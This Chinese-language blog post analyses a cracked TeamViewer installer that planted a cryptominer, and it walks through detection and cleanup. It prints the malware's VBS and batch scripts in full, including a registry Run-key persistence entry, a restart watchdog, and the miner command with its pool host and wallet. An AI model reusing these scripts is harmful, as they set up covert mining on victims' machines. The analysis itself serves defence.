0×0 故事背景
最近有個遠程管理一下某內網服(tiao)務(ban)器(ji)的需求,映射到公網又不安全畢竟黑帽子這麼多,思來想去之後還是覺得老老實實裝個Teamviewer最靠譜,度娘一下發現還真的不少破解版資源可以下載,於是隨意下載一個破解版準備開始操作。
0×1 安裝過程
先看一下文件描述信息也沒有發現什麼問題,就開始下一步安裝了。
安裝完成了功能正常,一切OK,漸漸的電腦開始卡到爆,敏感的白帽子有一種不好的預感。
0×2 問題排查
開始仔細的檢查一下進程列表在最後發現了一個奇怪的進程,居然被植入了挖礦病毒這個也太明顯了吧,也不搞點進程注入無文件攻擊之類的高端技術,系統盤下面也多了不少.bat與.vbs文件。
直接結束了挖礦的進程之後又自動起來了,還是看看這些同伴裡面到底寫了什麼玩意。
0.Servicecrsssr.vbs:
im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "%windir%\winvprse.bat", 0Set WShell = Nothing
1.Winprs.bat:
@Echo OffREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run /v "Chrome" /f /t REG_SZ /d "%windir%\servicecrsssr.vbs"Exit
2.Winvpr.vbs:
im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "winprs.bat", 0Set WShell = Nothing
3.Winvprse.bat:
@echo offSETLOCAL EnableExtensions:starttimeout /t 160 /nobreak > NULecho offtasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="0" goto starttasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="1" goto processnotrunning:processnotrunningstart "" "%windir%\\xdgaudio.vbs"goto startexit
4.xdgaudio.vbs
Dim WShell
Set WShell = CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://krb.crypto-coins.club:5555 -u KjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ -p x", 0
Set WShell = Nothing
5.Wmipvrse.exe
礦池與錢包都這麼出來了,看看到底挖了多少錢。
0×3 逆向分析
對Wmipvrse.exe這個進程裡面的東西還是感到好奇,決定還是看一看,已經加殼了不過還好是UPX的標準殼可直接脫。
CPU-miner github上面的開源代碼
0×4 病毒清理
事到如此根據幾個vbs與bat文件的內容,運行原理還是比較清楚了,就動手清理了。
Step1:使用PCHunter刪除6個病毒母體
servicecrsssr.vbs
Winprs.bat
Winvpr.vbs
Winvprse.bat
Wmipvrse.exe
xdgaudio.vbs
Step2:清除註冊表
0×5 總結
1.下載軟件儘量選擇官方平臺或者可信的第三方軟件平臺。
2.天下沒有白吃的午餐,破解版軟件裡面可能含有一些讓你驚喜的病毒木馬後門,也許是一個大禮包呢。
3.安全無小事,日常需注意。
閱讀更多 黑客迷 的文章